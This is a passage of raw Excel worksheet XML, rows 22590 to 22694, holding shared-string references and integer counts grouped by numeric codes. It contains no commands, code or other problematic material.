        <v>1978</v>
      </c>
    </row>
    <row r="22590" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22590" t="s">
        <v>16228</v>
      </c>
      <c r="B22590" t="s">
        <v>16213</v>
      </c>
      <c r="C22590">
        <v>0</v>
      </c>
      <c r="D22590">
        <v>1978</v>
      </c>
    </row>
    <row r="22591" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22591" t="s">
        <v>16231</v>
      </c>
      <c r="B22591" t="s">
        <v>16214</v>
      </c>
      <c r="C22591">
        <v>0</v>
      </c>
      <c r="D22591">
        <v>1978</v>
      </c>
    </row>
    <row r="22592" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22592" t="s">
        <v>16228</v>
      </c>
      <c r="B22592" t="s">
        <v>16215</v>
      </c>
      <c r="C22592">
        <v>20</v>
      </c>
      <c r="D22592">
        <v>1978</v>
      </c>
    </row>
    <row r="22593" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22593" t="s">
        <v>16231</v>
      </c>
      <c r="B22593" t="s">
        <v>16216</v>
      </c>
      <c r="C22593">
        <v>4</v>
      </c>
      <c r="D22593">
        <v>1978</v>
      </c>
    </row>
    <row r="22594" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22594" t="s">
        <v>16228</v>
      </c>
      <c r="B22594" t="s">
        <v>16217</v>
      </c>
      <c r="C22594">
        <v>0</v>
      </c>
      <c r="D22594">
        <v>1978</v>
      </c>
    </row>
    <row r="22595" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22595" t="s">
        <v>16231</v>
      </c>
      <c r="B22595" t="s">
        <v>16218</v>
      </c>
      <c r="C22595">
        <v>0</v>
      </c>
      <c r="D22595">
        <v>1978</v>
      </c>
    </row>
    <row r="22596" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22596" t="s">
        <v>16229</v>
      </c>
      <c r="B22596" t="s">
        <v>16219</v>
      </c>
      <c r="C22596">
        <v>0</v>
      </c>
      <c r="D22596">
        <v>1978</v>
      </c>
    </row>
    <row r="22597" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22597" t="s">
        <v>16230</v>
      </c>
      <c r="B22597" t="s">
        <v>16220</v>
      </c>
      <c r="C22597">
        <v>0</v>
      </c>
      <c r="D22597">
        <v>1978</v>
      </c>
    </row>
    <row r="22598" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22598" t="s">
        <v>16229</v>
      </c>
      <c r="B22598" t="s">
        <v>16221</v>
      </c>
      <c r="C22598">
        <v>0</v>
      </c>
      <c r="D22598">
        <v>1978</v>
      </c>
    </row>
    <row r="22599" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22599" t="s">
        <v>16230</v>
      </c>
      <c r="B22599" t="s">
        <v>16222</v>
      </c>
      <c r="C22599">
        <v>0</v>
      </c>
      <c r="D22599">
        <v>1978</v>
      </c>
    </row>
    <row r="22600" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22600" t="s">
        <v>16223</v>
      </c>
      <c r="B22600" t="s">
        <v>16223</v>
      </c>
      <c r="C22600">
        <v>0</v>
      </c>
      <c r="D22600">
        <v>1978</v>
      </c>
    </row>
    <row r="22601" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22601" t="s">
        <v>16224</v>
      </c>
      <c r="B22601" t="s">
        <v>16224</v>
      </c>
      <c r="C22601">
        <v>0</v>
      </c>
      <c r="D22601">
        <v>1978</v>
      </c>
    </row>
    <row r="22602" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22602" t="s">
        <v>16228</v>
      </c>
      <c r="B22602" t="s">
        <v>16211</v>
      </c>
      <c r="C22602">
        <v>0</v>
      </c>
      <c r="D22602">
        <v>757</v>
      </c>
    </row>
    <row r="22603" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22603" t="s">
        <v>16231</v>
      </c>
      <c r="B22603" t="s">
        <v>16212</v>
      </c>
      <c r="C22603">
        <v>0</v>
      </c>
      <c r="D22603">
        <v>757</v>
      </c>
    </row>
    <row r="22604" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22604" t="s">
        <v>16228</v>
      </c>
      <c r="B22604" t="s">
        <v>16213</v>
      </c>
      <c r="C22604">
        <v>0</v>
      </c>
      <c r="D22604">
        <v>757</v>
      </c>
    </row>
    <row r="22605" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22605" t="s">
        <v>16231</v>
      </c>
      <c r="B22605" t="s">
        <v>16214</v>
      </c>
      <c r="C22605">
        <v>0</v>
      </c>
      <c r="D22605">
        <v>757</v>
      </c>
    </row>
    <row r="22606" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22606" t="s">
        <v>16228</v>
      </c>
      <c r="B22606" t="s">
        <v>16215</v>
      </c>
      <c r="C22606">
        <v>2</v>
      </c>
      <c r="D22606">
        <v>757</v>
      </c>
    </row>
    <row r="22607" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22607" t="s">
        <v>16231</v>
      </c>
      <c r="B22607" t="s">
        <v>16216</v>
      </c>
      <c r="C22607">
        <v>0</v>
      </c>
      <c r="D22607">
        <v>757</v>
      </c>
    </row>
    <row r="22608" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22608" t="s">
        <v>16228</v>
      </c>
      <c r="B22608" t="s">
        <v>16217</v>
      </c>
      <c r="C22608">
        <v>1</v>
      </c>
      <c r="D22608">
        <v>757</v>
      </c>
    </row>
    <row r="22609" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22609" t="s">
        <v>16231</v>
      </c>
      <c r="B22609" t="s">
        <v>16218</v>
      </c>
      <c r="C22609">
        <v>0</v>
      </c>
      <c r="D22609">
        <v>757</v>
      </c>
    </row>
    <row r="22610" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22610" t="s">
        <v>16229</v>
      </c>
      <c r="B22610" t="s">
        <v>16219</v>
      </c>
      <c r="C22610">
        <v>1</v>
      </c>
      <c r="D22610">
        <v>757</v>
      </c>
    </row>
    <row r="22611" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22611" t="s">
        <v>16230</v>
      </c>
      <c r="B22611" t="s">
        <v>16220</v>
      </c>
      <c r="C22611">
        <v>2</v>
      </c>
      <c r="D22611">
        <v>757</v>
      </c>
    </row>
    <row r="22612" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22612" t="s">
        <v>16229</v>
      </c>
      <c r="B22612" t="s">
        <v>16221</v>
      </c>
      <c r="C22612">
        <v>2</v>
      </c>
      <c r="D22612">
        <v>757</v>
      </c>
    </row>
    <row r="22613" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22613" t="s">
        <v>16230</v>
      </c>
      <c r="B22613" t="s">
        <v>16222</v>
      </c>
      <c r="C22613">
        <v>0</v>
      </c>
      <c r="D22613">
        <v>757</v>
      </c>
    </row>
    <row r="22614" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22614" t="s">
        <v>16223</v>
      </c>
      <c r="B22614" t="s">
        <v>16223</v>
      </c>
      <c r="C22614">
        <v>25</v>
      </c>
      <c r="D22614">
        <v>757</v>
      </c>
    </row>
    <row r="22615" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22615" t="s">
        <v>16224</v>
      </c>
      <c r="B22615" t="s">
        <v>16224</v>
      </c>
      <c r="C22615">
        <v>0</v>
      </c>
      <c r="D22615">
        <v>757</v>
      </c>
    </row>
    <row r="22616" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22616" t="s">
        <v>16228</v>
      </c>
      <c r="B22616" t="s">
        <v>16211</v>
      </c>
      <c r="C22616">
        <v>0</v>
      </c>
      <c r="D22616">
        <v>269</v>
      </c>
    </row>
    <row r="22617" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22617" t="s">
        <v>16231</v>
      </c>
      <c r="B22617" t="s">
        <v>16212</v>
      </c>
      <c r="C22617">
        <v>0</v>
      </c>
      <c r="D22617">
        <v>269</v>
      </c>
    </row>
    <row r="22618" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22618" t="s">
        <v>16228</v>
      </c>
      <c r="B22618" t="s">
        <v>16213</v>
      </c>
      <c r="C22618">
        <v>0</v>
      </c>
      <c r="D22618">
        <v>269</v>
      </c>
    </row>
    <row r="22619" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22619" t="s">
        <v>16231</v>
      </c>
      <c r="B22619" t="s">
        <v>16214</v>
      </c>
      <c r="C22619">
        <v>0</v>
      </c>
      <c r="D22619">
        <v>269</v>
      </c>
    </row>
    <row r="22620" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22620" t="s">
        <v>16228</v>
      </c>
      <c r="B22620" t="s">
        <v>16215</v>
      </c>
      <c r="C22620">
        <v>41</v>
      </c>
      <c r="D22620">
        <v>269</v>
      </c>
    </row>
    <row r="22621" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22621" t="s">
        <v>16231</v>
      </c>
      <c r="B22621" t="s">
        <v>16216</v>
      </c>
      <c r="C22621">
        <v>41</v>
      </c>
      <c r="D22621">
        <v>269</v>
      </c>
    </row>
    <row r="22622" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22622" t="s">
        <v>16228</v>
      </c>
      <c r="B22622" t="s">
        <v>16217</v>
      </c>
      <c r="C22622">
        <v>145</v>
      </c>
      <c r="D22622">
        <v>269</v>
      </c>
    </row>
    <row r="22623" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22623" t="s">
        <v>16231</v>
      </c>
      <c r="B22623" t="s">
        <v>16218</v>
      </c>
      <c r="C22623">
        <v>57</v>
      </c>
      <c r="D22623">
        <v>269</v>
      </c>
    </row>
    <row r="22624" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22624" t="s">
        <v>16229</v>
      </c>
      <c r="B22624" t="s">
        <v>16219</v>
      </c>
      <c r="C22624">
        <v>16</v>
      </c>
      <c r="D22624">
        <v>269</v>
      </c>
    </row>
    <row r="22625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22625" t="s">
        <v>16230</v>
      </c>
      <c r="B22625" t="s">
        <v>16220</v>
      </c>
      <c r="C22625">
        <v>6</v>
      </c>
      <c r="D22625">
        <v>269</v>
      </c>
    </row>
    <row r="22626" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22626" t="s">
        <v>16229</v>
      </c>
      <c r="B22626" t="s">
        <v>16221</v>
      </c>
      <c r="C22626">
        <v>210</v>
      </c>
      <c r="D22626">
        <v>269</v>
      </c>
    </row>
    <row r="22627" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22627" t="s">
        <v>16230</v>
      </c>
      <c r="B22627" t="s">
        <v>16222</v>
      </c>
      <c r="C22627">
        <v>398</v>
      </c>
      <c r="D22627">
        <v>269</v>
      </c>
    </row>
    <row r="22628" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22628" t="s">
        <v>16223</v>
      </c>
      <c r="B22628" t="s">
        <v>16223</v>
      </c>
      <c r="C22628">
        <v>24</v>
      </c>
      <c r="D22628">
        <v>269</v>
      </c>
    </row>
    <row r="22629" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22629" t="s">
        <v>16224</v>
      </c>
      <c r="B22629" t="s">
        <v>16224</v>
      </c>
      <c r="C22629">
        <v>2</v>
      </c>
      <c r="D22629">
        <v>269</v>
      </c>
    </row>
    <row r="22630" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22630" t="s">
        <v>16228</v>
      </c>
      <c r="B22630" t="s">
        <v>16211</v>
      </c>
      <c r="C22630">
        <v>0</v>
      </c>
      <c r="D22630">
        <v>5803</v>
      </c>
    </row>
    <row r="22631" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22631" t="s">
        <v>16231</v>
      </c>
      <c r="B22631" t="s">
        <v>16212</v>
      </c>
      <c r="C22631">
        <v>0</v>
      </c>
      <c r="D22631">
        <v>5803</v>
      </c>
    </row>
    <row r="22632" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22632" t="s">
        <v>16228</v>
      </c>
      <c r="B22632" t="s">
        <v>16213</v>
      </c>
      <c r="C22632">
        <v>0</v>
      </c>
      <c r="D22632">
        <v>5803</v>
      </c>
    </row>
    <row r="22633" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22633" t="s">
        <v>16231</v>
      </c>
      <c r="B22633" t="s">
        <v>16214</v>
      </c>
      <c r="C22633">
        <v>0</v>
      </c>
      <c r="D22633">
        <v>5803</v>
      </c>
    </row>
    <row r="22634" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22634" t="s">
        <v>16228</v>
      </c>
      <c r="B22634" t="s">
        <v>16215</v>
      </c>
      <c r="C22634">
        <v>1</v>
      </c>
      <c r="D22634">
        <v>5803</v>
      </c>
    </row>
    <row r="22635" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22635" t="s">
        <v>16231</v>
      </c>
      <c r="B22635" t="s">
        <v>16216</v>
      </c>
      <c r="C22635">
        <v>1</v>
      </c>
      <c r="D22635">
        <v>5803</v>
      </c>
    </row>
    <row r="22636" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22636" t="s">
        <v>16228</v>
      </c>
      <c r="B22636" t="s">
        <v>16217</v>
      </c>
      <c r="C22636">
        <v>2</v>
      </c>
      <c r="D22636">
        <v>5803</v>
      </c>
    </row>
    <row r="22637" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22637" t="s">
        <v>16231</v>
      </c>
      <c r="B22637" t="s">
        <v>16218</v>
      </c>
      <c r="C22637">
        <v>0</v>
      </c>
      <c r="D22637">
        <v>5803</v>
      </c>
    </row>
    <row r="22638" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22638" t="s">
        <v>16229</v>
      </c>
      <c r="B22638" t="s">
        <v>16219</v>
      </c>
      <c r="C22638">
        <v>0</v>
      </c>
      <c r="D22638">
        <v>5803</v>
      </c>
    </row>
    <row r="22639" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22639" t="s">
        <v>16230</v>
      </c>
      <c r="B22639" t="s">
        <v>16220</v>
      </c>
      <c r="C22639">
        <v>0</v>
      </c>
      <c r="D22639">
        <v>5803</v>
      </c>
    </row>
    <row r="22640" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22640" t="s">
        <v>16229</v>
      </c>
      <c r="B22640" t="s">
        <v>16221</v>
      </c>
      <c r="C22640">
        <v>0</v>
      </c>
      <c r="D22640">
        <v>5803</v>
      </c>
    </row>
    <row r="22641" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22641" t="s">
        <v>16230</v>
      </c>
      <c r="B22641" t="s">
        <v>16222</v>
      </c>
      <c r="C22641">
        <v>0</v>
      </c>
      <c r="D22641">
        <v>5803</v>
      </c>
    </row>
    <row r="22642" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22642" t="s">
        <v>16223</v>
      </c>
      <c r="B22642" t="s">
        <v>16223</v>
      </c>
      <c r="C22642">
        <v>6</v>
      </c>
      <c r="D22642">
        <v>5803</v>
      </c>
    </row>
    <row r="22643" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22643" t="s">
        <v>16224</v>
      </c>
      <c r="B22643" t="s">
        <v>16224</v>
      </c>
      <c r="C22643">
        <v>1</v>
      </c>
      <c r="D22643">
        <v>5803</v>
      </c>
    </row>
    <row r="22644" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22644" t="s">
        <v>16228</v>
      </c>
      <c r="B22644" t="s">
        <v>16211</v>
      </c>
      <c r="C22644">
        <v>0</v>
      </c>
      <c r="D22644">
        <v>5928</v>
      </c>
    </row>
    <row r="22645" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22645" t="s">
        <v>16231</v>
      </c>
      <c r="B22645" t="s">
        <v>16212</v>
      </c>
      <c r="C22645">
        <v>0</v>
      </c>
      <c r="D22645">
        <v>5928</v>
      </c>
    </row>
    <row r="22646" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22646" t="s">
        <v>16228</v>
      </c>
      <c r="B22646" t="s">
        <v>16213</v>
      </c>
      <c r="C22646">
        <v>0</v>
      </c>
      <c r="D22646">
        <v>5928</v>
      </c>
    </row>
    <row r="22647" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22647" t="s">
        <v>16231</v>
      </c>
      <c r="B22647" t="s">
        <v>16214</v>
      </c>
      <c r="C22647">
        <v>0</v>
      </c>
      <c r="D22647">
        <v>5928</v>
      </c>
    </row>
    <row r="22648" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22648" t="s">
        <v>16228</v>
      </c>
      <c r="B22648" t="s">
        <v>16215</v>
      </c>
      <c r="C22648">
        <v>0</v>
      </c>
      <c r="D22648">
        <v>5928</v>
      </c>
    </row>
    <row r="22649" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22649" t="s">
        <v>16231</v>
      </c>
      <c r="B22649" t="s">
        <v>16216</v>
      </c>
      <c r="C22649">
        <v>1</v>
      </c>
      <c r="D22649">
        <v>5928</v>
      </c>
    </row>
    <row r="22650" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22650" t="s">
        <v>16228</v>
      </c>
      <c r="B22650" t="s">
        <v>16217</v>
      </c>
      <c r="C22650">
        <v>1</v>
      </c>
      <c r="D22650">
        <v>5928</v>
      </c>
    </row>
    <row r="22651" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22651" t="s">
        <v>16231</v>
      </c>
      <c r="B22651" t="s">
        <v>16218</v>
      </c>
      <c r="C22651">
        <v>3</v>
      </c>
      <c r="D22651">
        <v>5928</v>
      </c>
    </row>
    <row r="22652" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22652" t="s">
        <v>16229</v>
      </c>
      <c r="B22652" t="s">
        <v>16219</v>
      </c>
      <c r="C22652">
        <v>0</v>
      </c>
      <c r="D22652">
        <v>5928</v>
      </c>
    </row>
    <row r="22653" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22653" t="s">
        <v>16230</v>
      </c>
      <c r="B22653" t="s">
        <v>16220</v>
      </c>
      <c r="C22653">
        <v>0</v>
      </c>
      <c r="D22653">
        <v>5928</v>
      </c>
    </row>
    <row r="22654" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22654" t="s">
        <v>16229</v>
      </c>
      <c r="B22654" t="s">
        <v>16221</v>
      </c>
      <c r="C22654">
        <v>5</v>
      </c>
      <c r="D22654">
        <v>5928</v>
      </c>
    </row>
    <row r="22655" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22655" t="s">
        <v>16230</v>
      </c>
      <c r="B22655" t="s">
        <v>16222</v>
      </c>
      <c r="C22655">
        <v>0</v>
      </c>
      <c r="D22655">
        <v>5928</v>
      </c>
    </row>
    <row r="22656" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22656" t="s">
        <v>16223</v>
      </c>
      <c r="B22656" t="s">
        <v>16223</v>
      </c>
      <c r="C22656">
        <v>22</v>
      </c>
      <c r="D22656">
        <v>5928</v>
      </c>
    </row>
    <row r="22657" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22657" t="s">
        <v>16224</v>
      </c>
      <c r="B22657" t="s">
        <v>16224</v>
      </c>
      <c r="C22657">
        <v>0</v>
      </c>
      <c r="D22657">
        <v>5928</v>
      </c>
    </row>
    <row r="22658" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22658" t="s">
        <v>16228</v>
      </c>
      <c r="B22658" t="s">
        <v>16211</v>
      </c>
      <c r="C22658">
        <v>0</v>
      </c>
      <c r="D22658">
        <v>5922</v>
      </c>
    </row>
    <row r="22659" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22659" t="s">
        <v>16231</v>
      </c>
      <c r="B22659" t="s">
        <v>16212</v>
      </c>
      <c r="C22659">
        <v>0</v>
      </c>
      <c r="D22659">
        <v>5922</v>
      </c>
    </row>
    <row r="22660" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22660" t="s">
        <v>16228</v>
      </c>
      <c r="B22660" t="s">
        <v>16213</v>
      </c>
      <c r="C22660">
        <v>0</v>
      </c>
      <c r="D22660">
        <v>5922</v>
      </c>
    </row>
    <row r="22661" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22661" t="s">
        <v>16231</v>
      </c>
      <c r="B22661" t="s">
        <v>16214</v>
      </c>
      <c r="C22661">
        <v>0</v>
      </c>
      <c r="D22661">
        <v>5922</v>
      </c>
    </row>
    <row r="22662" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22662" t="s">
        <v>16228</v>
      </c>
      <c r="B22662" t="s">
        <v>16215</v>
      </c>
      <c r="C22662">
        <v>2</v>
      </c>
      <c r="D22662">
        <v>5922</v>
      </c>
    </row>
    <row r="22663" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22663" t="s">
        <v>16231</v>
      </c>
      <c r="B22663" t="s">
        <v>16216</v>
      </c>
      <c r="C22663">
        <v>1</v>
      </c>
      <c r="D22663">
        <v>5922</v>
      </c>
    </row>
    <row r="22664" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22664" t="s">
        <v>16228</v>
      </c>
      <c r="B22664" t="s">
        <v>16217</v>
      </c>
      <c r="C22664">
        <v>0</v>
      </c>
      <c r="D22664">
        <v>5922</v>
      </c>
    </row>
    <row r="22665" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22665" t="s">
        <v>16231</v>
      </c>
      <c r="B22665" t="s">
        <v>16218</v>
      </c>
      <c r="C22665">
        <v>0</v>
      </c>
      <c r="D22665">
        <v>5922</v>
      </c>
    </row>
    <row r="22666" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22666" t="s">
        <v>16229</v>
      </c>
      <c r="B22666" t="s">
        <v>16219</v>
      </c>
      <c r="C22666">
        <v>0</v>
      </c>
      <c r="D22666">
        <v>5922</v>
      </c>
    </row>
    <row r="22667" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22667" t="s">
        <v>16230</v>
      </c>
      <c r="B22667" t="s">
        <v>16220</v>
      </c>
      <c r="C22667">
        <v>1</v>
      </c>
      <c r="D22667">
        <v>5922</v>
      </c>
    </row>
    <row r="22668" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22668" t="s">
        <v>16229</v>
      </c>
      <c r="B22668" t="s">
        <v>16221</v>
      </c>
      <c r="C22668">
        <v>4</v>
      </c>
      <c r="D22668">
        <v>5922</v>
      </c>
    </row>
    <row r="22669" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22669" t="s">
        <v>16230</v>
      </c>
      <c r="B22669" t="s">
        <v>16222</v>
      </c>
      <c r="C22669">
        <v>4</v>
      </c>
      <c r="D22669">
        <v>5922</v>
      </c>
    </row>
    <row r="22670" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22670" t="s">
        <v>16223</v>
      </c>
      <c r="B22670" t="s">
        <v>16223</v>
      </c>
      <c r="C22670">
        <v>26</v>
      </c>
      <c r="D22670">
        <v>5922</v>
      </c>
    </row>
    <row r="22671" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22671" t="s">
        <v>16224</v>
      </c>
      <c r="B22671" t="s">
        <v>16224</v>
      </c>
      <c r="C22671">
        <v>1</v>
      </c>
      <c r="D22671">
        <v>5922</v>
      </c>
    </row>
    <row r="22672" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22672" t="s">
        <v>16228</v>
      </c>
      <c r="B22672" t="s">
        <v>16211</v>
      </c>
      <c r="C22672">
        <v>0</v>
      </c>
      <c r="D22672">
        <v>5751</v>
      </c>
    </row>
    <row r="22673" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22673" t="s">
        <v>16231</v>
      </c>
      <c r="B22673" t="s">
        <v>16212</v>
      </c>
      <c r="C22673">
        <v>0</v>
      </c>
      <c r="D22673">
        <v>5751</v>
      </c>
    </row>
    <row r="22674" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22674" t="s">
        <v>16228</v>
      </c>
      <c r="B22674" t="s">
        <v>16213</v>
      </c>
      <c r="C22674">
        <v>0</v>
      </c>
      <c r="D22674">
        <v>5751</v>
      </c>
    </row>
    <row r="22675" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22675" t="s">
        <v>16231</v>
      </c>
      <c r="B22675" t="s">
        <v>16214</v>
      </c>
      <c r="C22675">
        <v>0</v>
      </c>
      <c r="D22675">
        <v>5751</v>
      </c>
    </row>
    <row r="22676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22676" t="s">
        <v>16228</v>
      </c>
      <c r="B22676" t="s">
        <v>16215</v>
      </c>
      <c r="C22676">
        <v>0</v>
      </c>
      <c r="D22676">
        <v>5751</v>
      </c>
    </row>
    <row r="22677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22677" t="s">
        <v>16231</v>
      </c>
      <c r="B22677" t="s">
        <v>16216</v>
      </c>
      <c r="C22677">
        <v>0</v>
      </c>
      <c r="D22677">
        <v>5751</v>
      </c>
    </row>
    <row r="22678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22678" t="s">
        <v>16228</v>
      </c>
      <c r="B22678" t="s">
        <v>16217</v>
      </c>
      <c r="C22678">
        <v>1</v>
      </c>
      <c r="D22678">
        <v>5751</v>
      </c>
    </row>
    <row r="22679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22679" t="s">
        <v>16231</v>
      </c>
      <c r="B22679" t="s">
        <v>16218</v>
      </c>
      <c r="C22679">
        <v>2</v>
      </c>
      <c r="D22679">
        <v>5751</v>
      </c>
    </row>
    <row r="22680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22680" t="s">
        <v>16229</v>
      </c>
      <c r="B22680" t="s">
        <v>16219</v>
      </c>
      <c r="C22680">
        <v>0</v>
      </c>
      <c r="D22680">
        <v>5751</v>
      </c>
    </row>
    <row r="22681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22681" t="s">
        <v>16230</v>
      </c>
      <c r="B22681" t="s">
        <v>16220</v>
      </c>
      <c r="C22681">
        <v>0</v>
      </c>
      <c r="D22681">
        <v>5751</v>
      </c>
    </row>
    <row r="22682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22682" t="s">
        <v>16229</v>
      </c>
      <c r="B22682" t="s">
        <v>16221</v>
      </c>
      <c r="C22682">
        <v>0</v>
      </c>
      <c r="D22682">
        <v>5751</v>
      </c>
    </row>
    <row r="22683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22683" t="s">
        <v>16230</v>
      </c>
      <c r="B22683" t="s">
        <v>16222</v>
      </c>
      <c r="C22683">
        <v>0</v>
      </c>
      <c r="D22683">
        <v>5751</v>
      </c>
    </row>
    <row r="22684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22684" t="s">
        <v>16223</v>
      </c>
      <c r="B22684" t="s">
        <v>16223</v>
      </c>
      <c r="C22684">
        <v>10</v>
      </c>
      <c r="D22684">
        <v>5751</v>
      </c>
    </row>
    <row r="22685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22685" t="s">
        <v>16224</v>
      </c>
      <c r="B22685" t="s">
        <v>16224</v>
      </c>
      <c r="C22685">
        <v>1</v>
      </c>
      <c r="D22685">
        <v>5751</v>
      </c>
    </row>
    <row r="22686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22686" t="s">
        <v>16228</v>
      </c>
      <c r="B22686" t="s">
        <v>16211</v>
      </c>
      <c r="C22686">
        <v>0</v>
      </c>
      <c r="D22686">
        <v>5789</v>
      </c>
    </row>
    <row r="22687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22687" t="s">
        <v>16231</v>
      </c>
      <c r="B22687" t="s">
        <v>16212</v>
      </c>
      <c r="C22687">
        <v>0</v>
      </c>
      <c r="D22687">
        <v>5789</v>
      </c>
    </row>
    <row r="22688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22688" t="s">
        <v>16228</v>
      </c>
      <c r="B22688" t="s">
        <v>16213</v>
      </c>
      <c r="C22688">
        <v>0</v>
      </c>
      <c r="D22688">
        <v>5789</v>
      </c>
    </row>
    <row r="22689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22689" t="s">
        <v>16231</v>
      </c>
      <c r="B22689" t="s">
        <v>16214</v>
      </c>
      <c r="C22689">
        <v>0</v>
      </c>
      <c r="D22689">
        <v>5789</v>
      </c>
    </row>
    <row r="22690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22690" t="s">
        <v>16228</v>
      </c>
      <c r="B22690" t="s">
        <v>16215</v>
      </c>
      <c r="C22690">
        <v>1</v>
      </c>
      <c r="D22690">
        <v>5789</v>
      </c>
    </row>
    <row r="22691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22691" t="s">
        <v>16231</v>
      </c>
      <c r="B22691" t="s">
        <v>16216</v>
      </c>
      <c r="C22691">
        <v>1</v>
      </c>
      <c r="D22691">
        <v>5789</v>
      </c>
    </row>
    <row r="22692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22692" t="s">
        <v>16228</v>
      </c>
      <c r="B22692" t="s">
        <v>16217</v>
      </c>
      <c r="C22692">
        <v>5</v>
      </c>
      <c r="D22692">
        <v>5789</v>
      </c>
    </row>
    <row r="22693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22693" t="s">
        <v>16231</v>
      </c>
      <c r="B22693" t="s">
        <v>16218</v>
      </c>
      <c r="C22693">
        <v>9</v>
      </c>
      <c r="D22693">
        <v>5789</v>
      </c>
    </row>
    <row r="22694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22694" t="s">
        <v>16229</v>
      </c>
      <c r="B22694" t="s">
        <v>16219</v>
      </c>
      <c r="C22694">
        <v>0</v>
      </c>
      <c r="D22694">
        <v>5789</v>
